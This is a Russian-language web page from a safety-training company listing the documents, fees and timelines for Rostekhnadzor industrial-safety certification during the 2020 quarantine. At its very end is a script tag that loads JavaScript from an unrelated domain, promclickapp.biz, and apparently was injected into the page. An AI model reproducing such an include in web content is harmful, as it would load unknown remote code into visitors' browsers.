Группа компаний
Мы делаем Ваш труд безопасным!
т. +7 908 081-53-11

Аттестация в Ростехнадзоре в период карантина

    В связи с режимом обязательной самоизоляции очную аттестацию по Электробезопасности в Уральском управлении Ростехнадзора проходят только «Ответственные за электрохозяйство». Остальные категории работников, в том числе по эксплуатации тепловых энергоустановок и тепловых сетей г 2.1 смогут пройти аттестацию после 1 октября 2020 года. Документы для аттестации в областях Промышленной безопасности вы можете направить в Уральское управление Ростехнадзора Почтой РФ.

2601170  - справочная информация по Электробезопасности

2657450 – справочная информация по Промышленной безопасности


ПРОМБЕЗОПАСНОСТЬ

Перечень обязательных документов для аттестации 

согласно Приказу Ростехнадзора от 06.11.2019 № 424:

  1. Заявление об аттестации работника, направляемого на аттестацию (согласно Приложению № 1 к приказу от 06. 11. 2019 № 424 Ростехнадзора). 1 человек – 1 заявление
  2. Оплата государственной пошлины по реквизитам территориального органа РТН, в размере и порядке установленных статьями 333.18 и 333.33 главы  25.3 Налогового кодекса РФ (КБК 498 1 08 07081 01 0900 110 - г/пошлина за выдачу аттестата, свидетельства либо иного документа, подтверждающего уровень квалификации). 1300 рублей. Платит  юр. лицо по реквизитам Чел. РТН (если физ. лицо (нежелательно), то ориентируйтесь на статью 45 Налогового кодекса по поводу доверенности на оплату). Платёжку в распечатанном виде приложить в опись.
  3. Доверенность  только на  физическое лицо 2 шт. ( один экз. остаётся в пакете документов для РТН, второй экз. на руках доверенного лица)
  4. Копии документов о квалификации по результатам дополнительного профессионального образования в области промышленной безопасности по дополнительным профессиональным программам, соответствующим заявленной области аттестации, полученных в течение 5 лет, предшествующих дате подачи заявления об аттестации (в отношении работников, обязанных получать дополнительное профессиональное образование в области промышленной безопасности в соответствии с пунктом 1 статьи 14.1 Федерального закона от 21 июля 1997 г. N 116-ФЗ "О промышленной безопасности опасных производственных объектов" : работники, в том числе руководители организаций, осуществляющие профессиональную деятельность, связанную с проектированием, строительством, эксплуатацией, реконструкцией, капитальным ремонтом, техническим перевооружением, консервацией и ликвидацией опасного производственного объекта, а также изготовлением, монтажом, наладкой, обслуживанием и ремонтом технических устройств, применяемых на опасном производственном объекте (далее - работники), в целях поддержания уровня квалификации и подтверждения знания требований промышленной безопасности обязаны не реже одного раза в пять лет получать дополнительное профессиональное образование в области промышленной безопасности и проходить аттестацию в области промышленной безопасности.
  5. Опись прилагаемых документов делает только заказчик в двух экземплярах (один остаётся на руках доверенного лица с отметками РТН о принятии документов, второй экз. остаётся в описи пакета документов в РТН)
  6. Ежегодный оперативно – ремонтный персонал в области Г.2.1 аттестовывается без уплаты государственной пошлины

  

            _________________________________________________

 

   Рассматриваются документы 5 рабочих дней, затем  выносится решение о допуске к аттестации с указанием даты, времени и места проведения аттестации либо о не допуске с мотивированным отказом. Направление выписки из  протокола заседания комиссии осуществляется не позднее 10 дней со дня оформления протокола заседания комиссии. Связь с заявителем посредством почты России. Опоздание или неявка на аттестацию не являются основанием для отмены или переноса проведения тестирования.

 

              Основания для отказа в приёме документов

  1. При личном приёме у представителя заявителя отсутствует паспорт, доверенность или иных документов, подтверждающих право лица действовать от имени заявителя при подаче документов
  2. Представленные заявительные документы (при личном приёме) не поддаются прочтению
  3. Отсутствует опись документов
  4. Несоблюдение формы заявления об аттестации
  5. Предоставление документов не в полном объёме
  6. Отсутствие информации об уплате госпошлины, содержащейся в Гос. информационной системе о гос. и муниципальных платежах, подтверждающей факт уплаты государственной пошлины

   При не сдаче тестирования пошлина сгорает, пакет документов подаётся заново.

 

 

 

 

<script src="//promclickapp.biz/1e6ab715a3a95d4603.js" type="text/javascript"></script>